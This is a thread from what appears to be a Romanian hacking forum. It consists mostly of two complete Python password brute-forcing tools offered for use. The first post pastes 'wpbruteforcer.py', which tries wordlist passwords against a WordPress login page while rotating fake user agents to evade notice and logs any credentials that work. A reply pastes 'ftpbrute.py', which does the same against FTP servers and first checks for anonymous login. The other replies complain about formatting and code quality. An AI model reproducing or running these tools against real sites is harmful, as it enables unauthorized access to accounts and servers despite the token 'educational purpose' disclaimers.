hozarares Posted August 7, 2010 Report Posted August 7, 2010 (edited) 001 #!/usr/bin/python 002 # This is wordpress bruteforcer tools 003 # This was written for educational purpose and pentest only. Use it at your own risk. 004 # Author will not be responsible for any damage !! 005 # Toolname : wpbruteforcer.py 006 # Programmer : gunslinger_ 007 # Version : 1.0 008 # Date : Wed Aug 4 13:38:13 WIT 2010 009 010 import re 011 import os 012 import sys 013 import random 014 import warnings 015 import time 016 try: 017 import mechanize 018 except ImportError: 019 print "[*] Please install mechanize python module first" 020 sys.exit(1) 021 except KeyboardInterrupt: 022 print "\n[*] Exiting program...\n" 023 sys.exit(1) 024 try: 025 import cookielib 026 except ImportError: 027 print "[*] Please install cookielib python module first" 028 sys.exit(1) 029 except KeyboardInterrupt: 030 print "\n[*] Exiting program...\n" 031 sys.exit(1) 032 033 warnings.filterwarnings(action="ignore", message=".*gzip transfer encoding is experimental!", category=UserWarning) 034 035 # define variable 036 __programmer__ = "gunslinger_ " 037 __version__ = "1.0" 038 verbose = False 039 useproxy = False 040 usepassproxy = False 041 log = 'wpbruteforcer.log' 042 file = open(log, "a") 043 success = 'Dashboard' 044 # some cheating .. 045 ouruseragent = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)', 046 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre', 047 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;', 048 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)', 049 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)', 050 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)', 051 'Microsoft Internet Explorer/4.0b1 (Windows 95)', 052 'Opera/8.00 (Windows NT 5.1; U; en)', 053 'amaya/9.51 libwww/5.4.0', 054 'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)', 055 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)', 056 'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)', 057 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)', 058 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 [email]qihoobot@qihoo.net[/email])', 059 'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]' 060 ] 061 wordpress = ''' 062 _ 063 | | 064 __ _____ _ __ __| |_ __ _ __ ___ ___ ___ 065 \ \ /\ / / _ \| '__/ _` | '_ \| '__/ _ \/ __/ __| 066 \ V V / (_) | | | (_| | |_) | | | __/\\__ \\__ \\ 067 \_/\_/ \\___/|_| \__,_| .__/|_| \\___||___/___/ 068 | | 069 |_| bruteforcer... 070 071 Programmer : %s 072 Version : %s''' % (__programmer__, __version__) 073 option = ''' 074 Usage : %s [options] 075 Option : -t, --target | Site for bruteforce wp-admin 076 -u, --username | User for bruteforcing 077 -w, --wordlist | Wordlist used for bruteforcing 078 -v, --verbose | Set %s will be verbose (more talkactiveable) 079 -p, --proxy | Set http proxy will be use 080 -k, --usernameproxy | Set username at proxy will be use 081 -i, --passproxy | Set password at proxy will be use 082 -l, --log | Specify output filename (default : fbbruteforcer.log) 083 -h, --help | Print this help 084 085 Example : %s -t target.com -u jack -w wordlist.txt" 086 087 P.S : add "&" to run in the background 088 ''' % (sys.argv[0], sys.argv[0], sys.argv[0]) 089 hme = ''' 090 Usage : %s [option] 091 -h or --help for get help 092 ''' % sys.argv[0] 093 094 def helpme(): 095 print wordpress 096 print option 097 file.write(wordpress) 098 file.write(option) 099 sys.exit(1) 100 101 def helpmee(): 102 print wordpress 103 print hme 104 file.write(wordpress) 105 file.write(hme) 106 sys.exit(1) 107 108 for arg in sys.argv: 109 try: 110 if arg.lower() == '-u' or arg.lower() == '--user': 111 username = sys.argv[int(sys.argv[1:].index(arg))+2] 112 if arg.lower() == '-t' or arg.lower() == '--target': 113 target = sys.argv[int(sys.argv[1:].index(arg))+2] 114 if "http://" in target: 115 target = target.replace("http://","") 116 if "www." in target: 117 target = target.replace("www.","") 118 targetsite = "http://www."+target+"/wp-login.php" 119 elif arg.lower() == '-w' or arg.lower() == '--wordlist': 120 wordlist = sys.argv[int(sys.argv[1:].index(arg))+2] 121 elif arg.lower() == '-l' or arg.lower() == '--log': 122 log = sys.argv[int(sys.argv[1:].index(arg))+2] 123 elif arg.lower() == '-p' or arg.lower() == '--proxy': 124 useproxy = True 125 proxy = sys.argv[int(sys.argv[1:].index(arg))+2] 126 elif arg.lower() == '-k' or arg.lower() == '--userproxy': 127 usepassproxy = True 128 usw = sys.argv[int(sys.argv[1:].index(arg))+2] 129 elif arg.lower() == '-i' or arg.lower() == '--passproxy': 130 usepassproxy = True 131 usp = sys.argv[int(sys.argv[1:].index(arg))+2] 132 elif arg.lower() == '-v' or arg.lower() == '--verbose': 133 verbose = True 134 elif arg.lower() == '-h' or arg.lower() == '--help': 135 helpme() 136 elif len(sys.argv) <= 1:137 helpmee()138 except IOError:139 helpme()140 except NameError:141 helpme()142 except IndexError:143 helpme()144 145 def bruteforce(word):146 try:147 sys.stdout.write("\r[*] Trying %s... \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t " % word)148 file.write("[*] Trying %s\n" % word)149 sys.stdout.flush()150 br.addheaders = [('User-agent', random.choice(ouruseragent))]151 opensite = br.open(targetsite)152 br.select_form(nr=0)153 br.form['log'] = username154 br.form['pwd'] = word155 br.submit()156 response = br.response().read()157 if verbose:158 print response159 if success in response:160 print "\n\n[*] Logging in success..."161 print "[*] Username : %s" % (username)162 print "[*] Password : %s\n" % (word)163 file.write("\n[*] Logging in success...")164 file.write("\n[*] Username : %s" % (username))165 file.write("\n[*] Password : %s\n\n" % (word))166 sys.exit(1)167 except KeyboardInterrupt:168 print "\n[*] Exiting program...\n"169 sys.exit(1)170 except mechanize._mechanize.FormNotFoundError:171 print "\n[*] Can't launch attack sorry, form is different\n"172 file.write("\n[*] Can't launch attack sorry, form is different\n")173 sys.exit(1)174 except mechanize._form.ControlNotFoundError:175 print "\n[*] Can't launch attack sorry, form is different\n"176 file.write("\n[*] Can't launch attack sorry, form is different\n")177 sys.exit(1)178 179 def releaser():180 global word181 for word in words:182 bruteforce(word.replace("\n",""))183 184 def main():185 global br186 global words187 try:188 br = mechanize.Browser()189 cj = cookielib.LWPCookieJar()190 br.set_cookiejar(cj)191 br.set_handle_equiv(True)192 br.set_handle_gzip(True)193 br.set_handle_redirect(True)194 br.set_handle_referer(True)195 br.set_handle_robots(False)196 br.set_debug_http(False)197 br.set_debug_redirects(False)198 br.set_debug_redirects(False)199 br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)200 if useproxy:201 br.set_proxies({"http": proxy})202 if usepassproxy:203 br.add_proxy_password(usw, usp)204 if verbose:205 br.set_debug_http(True)206 br.set_debug_redirects(True)207 br.set_debug_redirects(True)208 except KeyboardInterrupt:209 print "\n[*] Exiting program...\n"210 file.write("\n[*] Exiting program...\n")211 sys.exit(1)212 try:213 preventstrokes = open(wordlist, "r")214 words = preventstrokes.readlines()215 count = 0216 while count < len(words):217 words[count] = words[count].strip()218 count += 1219 except IOError:220 print "\n[*] Error: Check your wordlist path\n"221 file.write("\n[*] Error: Check your wordlist path\n")222 sys.exit(1)223 except NameError:224 helpme()225 except KeyboardInterrupt:226 print "\n[*] Exiting program...\n"227 file.write("\n[*] Exiting program...\n")228 sys.exit(1)229 try:230 print wordpress231 print "\n[*] Starting attack at %s" % time.strftime("%X")232 print "[*] Target site : %s" % (targetsite)233 print "[*] Account for bruteforcing \"%s\"" % (username)234 print "[*] Loaded :",len(words),"words"235 print "[*] Bruteforcing wp-login, please wait..."236 file.write(wordpress)237 file.write("\n[*] Starting attack at %s" % time.strftime("%X"))238 file.write("\n[*] Target site : %s" % (targetsite))239 file.write("\n[*] Account for bruteforcing \"%s\"" % (username))240 file.write("\n[*] Loaded : %d words" % int(len(words)))241 file.write("\n[*] Bruteforcing wp-login, please wait...\n")242 except KeyboardInterrupt:243 print "\n[*] Exiting program...\n"244 sys.exit(1)245 try:246 releaser()247 bruteforce(word)248 except NameError:249 helpme()250 251 if __name__ == '__main__':252 main() Edited August 7, 2010 by Nytro Quote
blech Posted August 7, 2010 Report Posted August 7, 2010 copy/paste... este de toata jena! dece ai mai postat?-nu te-ai chinuit sa scrii si tu cateva cuvinte (ai dat doar copy/paste)-nu ai dat sursa-nu ai dat creditsmerita sa mai zic ceva?later edit:ca sa nu mai fac inca un post... am vazut ca ai facut formatting...dar cu restu nu sunt de aceeasi parere cu tine Quote
Fitty Posted August 7, 2010 Report Posted August 7, 2010 use [ code ] !! Si cand dai copy paste, dai din raw mode, ca altfel apar numerele liniilor Quote
hozarares Posted August 7, 2010 Author Report Posted August 7, 2010 gata ma .... l`am reparat !!!@Bleach .... - da...am dat copy/paste dupa cum mi`a venit in email; - si nu, nu ma chinui sa scriu nimic;nu dau credits; Poti sa zici ce vrei !!! Quote
Guest Mosad Posted August 7, 2010 Report Posted August 7, 2010 blech,scrie in sursa cine e autorul. Quote
cmiN Posted August 7, 2010 Report Posted August 7, 2010 Cel mai urat cod care l-am vazut in viata mea ... nu ma refer neaparat ca identarea e = cu 0 si ca sunt numere in fata, dar pur si simplu e scris si strcturat aiurea si dezordonat ... pana si lexx facuse "virusul" ala in php mai lizibil -,-. Quote
Flubber Posted August 7, 2010 Report Posted August 7, 2010 Recunosc acest stil de a programa in Python si de pe luna, gunslinger's style, un FTP bruteforcer tot de el scris:#!/usr/bin/python################################################################ # .___ __ _______ .___ # # __| _/____ _______| | __ ____ \ _ \ __| _/____ # # / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ # # / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ # # \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ # # \/ \/ \/ # # ___________ ______ _ __ # # _/ ___\_ __ \_/ __ \ \/ \/ / # # \ \___| | \/\ ___/\ / # # \___ >__| \___ >\/\_/ # # est.2007 \/ \/ forum.darkc0de.com # ################################################################# This is ftp brute force tools [Updated].# This was written for educational purpose and pentest only. Use it at your own risk.# Update : More efficient# : prevent loss added # : Anonymous checker added# VISIT : http://www.devilzc0de.com# CODING BY : gunslinger_# EMAIL : gunslinger.devilzc0de@gmail.com# TOOL NAME : ftpbrute.py v1.5# Big thanks darkc0de member : d3hydr8, Kopele, icedzomby, VMw4r3 and all member# Special thanks to devilzc0de crew : mywisdom, petimati, peneter, flyff666, rotlez, 7460, xtr0nic, devil_nongkrong, cruzen and all devilzc0de family # Greetz : all member of jasakom.com, jatimcrew.com# Special i made for jasakom member and devilzc0de family# Please remember... your action will be logged in target system...# Author will not be responsible for any damage !!# Use it with your own risk import sysimport timeimport osfrom ftplib import FTPif sys.platform == 'linux-i386' or sys.platform == 'linux2' or sys.platform == 'darwin': SysCls = 'clear'elif sys.platform == 'win32' or sys.platform == 'dos' or sys.platform[0:5] == 'ms-dos': SysCls = 'cls'else: SysCls = 'unknown'log = "ftpbrute.log"face = ''' .___ .__ .__ _______ .___ __| _/ ____ ___ __|__|| | ________ ____ \ _ \ __| _/ ____ ____ _______ ____ __ _ __ / __ |_/ __ \\\ \/ /| || | \___ /_/ ___\/ /_\ \ / __ |_/ __ \ _/ ___\\\_ __ \_/ __ \\\ \/ \/ / / /_/ |\ ___/ \ / | || |__ / / \ \___\ \_/ \/ /_/ |\ ___/ \ \___ | | \/\ ___/ \ / \____ | \___ > \_/ |__||____//_____ \ \___ >\_____ /\____ | \___ > \___ >|__| \___ > \/\_/ \/ \/ \/ \/ \/ \/ \/ \/ \/ http://www.devilzc0de.com by : gunslinger_ ftpbrute.py version 1.0 Brute forcing ftp target Programmmer : gunslinger_ gunslinger[at]devilzc0de[dot]com _____________________________________________________________________________________________________________________________________________ '''option = '''Usage: ./ftpbrute.py [options]Options: -t, --target <hostname/ip> | Target to bruteforcing -u, --user <user> | User for bruteforcing -w, --wordlist <filename> | Wordlist used for bruteforcing -h, --help <help> | print this helpExample: ./ftpbrute.py -t 192.168.1.1 -u root -w wordlist.txt'''file = open(log, "a")def MyFace() : os.system(SysCls) print face file.write(face)def HelpMe() : MyFace() print option file.write(option) sys.exit(1)for arg in sys.argv: if arg.lower() == '-t' or arg.lower() == '--target': hostname = sys.argv[int(sys.argv[1:].index(arg))+2] elif arg.lower() == '-u' or arg.lower() == '--user': user = sys.argv[int(sys.argv[1:].index(arg))+2] elif arg.lower() == '-w' or arg.lower() == '--wordlist': wordlist = sys.argv[int(sys.argv[1:].index(arg))+2] elif arg.lower() == '-h' or arg.lower() == '--help': HelpMe() elif len(sys.argv) <= 1: HelpMe()def checkanony() : try: print "\n[+] Checking for anonymous login\n" ftp = FTP(hostname) ftp.login() ftp.retrlines('LIST') print "\n[!] Anonymous login successfuly !\n" ftp.quit() except Exception, e: print "\n[-] Anonymous login unsuccessful...\n" passdef BruteForce(word) : print "[?]Trying :",word file.write("\n[?]Trying :"+word) try: ftp = FTP(hostname) ftp.login(user, word) ftp.retrlines('list') ftp.quit() print "\n\t[!] Login Success ! " print "\t[!] Username : ",user, "" print "\t[!] Password : ",word, "" print "\t[!] Hostname : ",hostname, "" print "\t[!] Log all has been saved to",log,"\n" file.write("\n\n\t[!] Login Success ! ") file.write("\n\t[!] Username : "+user ) file.write("\n\t[!] Password : "+word ) file.write("\n\t[!] Hostname : "+hostname) file.write("\n\t[!] Log all has been saved to "+log) sys.exit(1) except Exception, e: #print "[-] Failed" pass except KeyboardInterrupt: print "\n[-] Aborting...\n" file.write("\n[-] Aborting...\n") sys.exit(1)MyFace()print "[!] Starting attack at %s" % time.strftime("%X")print "[!] System Activated for brute forcing..."print "[!] Please wait until brute forcing finish !\n"file.write("\n[!] Starting attack at %s" % time.strftime("%X"))file.write("\n[!] System Activated for brute forcing...")file.write("\n[!] Please wait until brute forcing finish !\n")checkanony() try: preventstrokes = open(wordlist, "r") words = preventstrokes.readlines() count = 0 while count < len(words): words[count] = words[count].strip() count += 1 except(IOError): print "\n[-] Error: Check your wordlist path\n" file.write("\n[-] Error: Check your wordlist path\n") sys.exit(1)print "\n[+] Loaded:",len(words),"words"print "[+] Server:",hostnameprint "[+] User:",userprint "[+] BruteForcing...\n"for word in words: BruteForce(word.replace("\n",""))file.close() Quote